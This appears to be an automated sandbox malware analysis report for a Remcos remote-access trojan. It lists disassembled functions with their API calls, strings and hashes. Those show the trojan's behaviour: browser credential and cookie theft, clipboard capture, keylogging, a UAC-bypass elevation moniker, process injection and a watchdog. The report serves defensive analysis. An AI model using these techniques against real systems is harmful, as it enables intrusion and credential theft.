                                        • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                        • API String ID: 3018269243-13974260
                                        • Opcode ID: ec87f336c2b408306c41aada36fdf53bb23932e81f2324c776ad30bae8eba27e
                                        • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                        • Opcode Fuzzy Hash: ec87f336c2b408306c41aada36fdf53bb23932e81f2324c776ad30bae8eba27e
                                        • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                        Function 0040BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                        • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                        • FindClose.KERNEL32(00000000), ref: 0040BD12
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$CloseFile$FirstNext
                                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                        • API String ID: 1164774033-3681987949
                                        • Opcode ID: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
                                        • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                        • Opcode Fuzzy Hash: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
                                        • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                        Function 004168C1 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenClipboard.USER32 ref: 004168C2
                                        • EmptyClipboard.USER32 ref: 004168D0
                                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                        • GlobalLock.KERNEL32(00000000), ref: 004168F9
                                        • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                                        • CloseClipboard.USER32 ref: 00416955
                                        • OpenClipboard.USER32 ref: 0041695C
                                        • GetClipboardData.USER32(0000000D), ref: 0041696C
                                        • GlobalLock.KERNEL32(00000000), ref: 00416975
                                        • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                        • CloseClipboard.USER32 ref: 00416984
                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                        • String ID: !D@
                                        • API String ID: 3520204547-604454484
                                        • Opcode ID: fea27c55c69ede12a1baf9e6355ec21cd56ce7331c7cfd7b3a0e760041973ea9
                                        • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                        • Opcode Fuzzy Hash: fea27c55c69ede12a1baf9e6355ec21cd56ce7331c7cfd7b3a0e760041973ea9
                                        • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                        Function 0040BD37 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                        • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                        • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                        • FindClose.KERNEL32(00000000), ref: 0040BED0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$Close$File$FirstNext
                                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                        • API String ID: 3527384056-432212279
                                        • Opcode ID: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
                                        • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                                        • Opcode Fuzzy Hash: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
                                        • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                                        Function 0040F474 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475338), ref: 0040F4B9
                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                        • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                        • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                        • API String ID: 3756808967-1743721670
                                        • Opcode ID: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
                                        • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                        • Opcode Fuzzy Hash: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
                                        • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                        Function 00419627 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 0$1$2$3$4$5$6$7$VG
                                        • API String ID: 0-1861860590
                                        • Opcode ID: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
                                        • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                        • Opcode Fuzzy Hash: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
                                        • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                        Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 00407521
                                        • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Object_wcslen
                                        • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                        • API String ID: 240030777-3166923314
                                        • Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                        • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                        • Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                        • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                        Function 0041A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                        • GetLastError.KERNEL32 ref: 0041A7BB
                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                        • String ID:
                                        • API String ID: 3587775597-0
                                        • Opcode ID: a92e5e22f525c5d855de5902c8743aa5aa96fd2eb9e2bef805906780dfe370d3
                                        • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                        • Opcode Fuzzy Hash: a92e5e22f525c5d855de5902c8743aa5aa96fd2eb9e2bef805906780dfe370d3
                                        • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                        Function 00452610 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                          • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                        • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                        • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                        • String ID: lJD$lJD$lJD
                                        • API String ID: 745075371-479184356
                                        • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                        • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                        • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                        • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                        Function 0040C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                        • FindClose.KERNEL32(00000000), ref: 0040C47D
                                        • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$CloseFile$FirstNext
                                        • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                        • API String ID: 1164774033-405221262
                                        • Opcode ID: 0461f3560dc0d6eeac0ce167accbc0eb794526df5cd1a385b4c4cd5d367a624b
                                        • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                        • Opcode Fuzzy Hash: 0461f3560dc0d6eeac0ce167accbc0eb794526df5cd1a385b4c4cd5d367a624b
                                        • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                        Function 0041C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B
                                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                        • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                        • String ID:
                                        • API String ID: 2341273852-0
                                        • Opcode ID: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                        • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                        • Opcode Fuzzy Hash: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                        • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                        Function 00419AF5 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                        • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Find$CreateFirstNext
                                        • String ID: 8SG$PXG$PXG$NG$PG
                                        • API String ID: 341183262-3812160132
                                        • Opcode ID: 5994fb28f0a65c682bf7e78567ac2feaa865d922d468e60f9a7c6d49d4d7ee90
                                        • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                        • Opcode Fuzzy Hash: 5994fb28f0a65c682bf7e78567ac2feaa865d922d468e60f9a7c6d49d4d7ee90
                                        • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                        Function 0040A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A416
                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                        • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                        • GetKeyState.USER32(00000010), ref: 0040A433
                                        • GetKeyboardState.USER32(?,?,004750F0), ref: 0040A43E
                                        • ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                        • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                        • ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                        • String ID:
                                        • API String ID: 1888522110-0
                                        • Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                        • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                                        • Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                        • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                        Function 00413FCA Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
                                        • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressCloseCreateLibraryLoadProcsend
                                        • String ID: SHDeleteKeyW$Shlwapi.dll
                                        • API String ID: 2127411465-314212984
                                        • Opcode ID: ec507b0493fd4fd584cfcadeaf977d3343d777ca479f652cc31a06200245f1e9
                                        • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                                        • Opcode Fuzzy Hash: ec507b0493fd4fd584cfcadeaf977d3343d777ca479f652cc31a06200245f1e9
                                        • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                                        Function 00449190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 00449212
                                        • _free.LIBCMT ref: 00449236
                                        • _free.LIBCMT ref: 004493BD
                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                        • _free.LIBCMT ref: 00449589
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                        • String ID:
                                        • API String ID: 314583886-0
                                        • Opcode ID: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
                                        • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                                        • Opcode Fuzzy Hash: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
                                        • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                                        Function 004167B4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                          • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                          • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                          • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                          • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                        • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                        • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                                        • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                        • String ID: !D@$PowrProf.dll$SetSuspendState
                                        • API String ID: 1589313981-2876530381
                                        • Opcode ID: 9a934de52b527b267113561337be7989eb89f8ca40bdc05900ad91c88e6bd2be
                                        • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                        • Opcode Fuzzy Hash: 9a934de52b527b267113561337be7989eb89f8ca40bdc05900ad91c88e6bd2be
                                        • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                        Function 0045243C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                        • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                        • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID: ACP$OCP$['E
                                        • API String ID: 2299586839-2532616801
                                        • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                        • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                        • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                        • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                        Function 0040BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                        • GetLastError.KERNEL32 ref: 0040BA58
                                        Strings
                                        • UserProfile, xrefs: 0040BA1E
                                        • [Chrome StoredLogins not found], xrefs: 0040BA72
                                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                        • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DeleteErrorFileLast
                                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                        • API String ID: 2018770650-1062637481
                                        • Opcode ID: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
                                        • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                        • Opcode Fuzzy Hash: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
                                        • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                        Function 00417952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                        • GetLastError.KERNEL32 ref: 0041799D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                        • String ID: SeShutdownPrivilege
                                        • API String ID: 3534403312-3733053543
                                        • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                        • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                        • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                        • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                        Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00409258
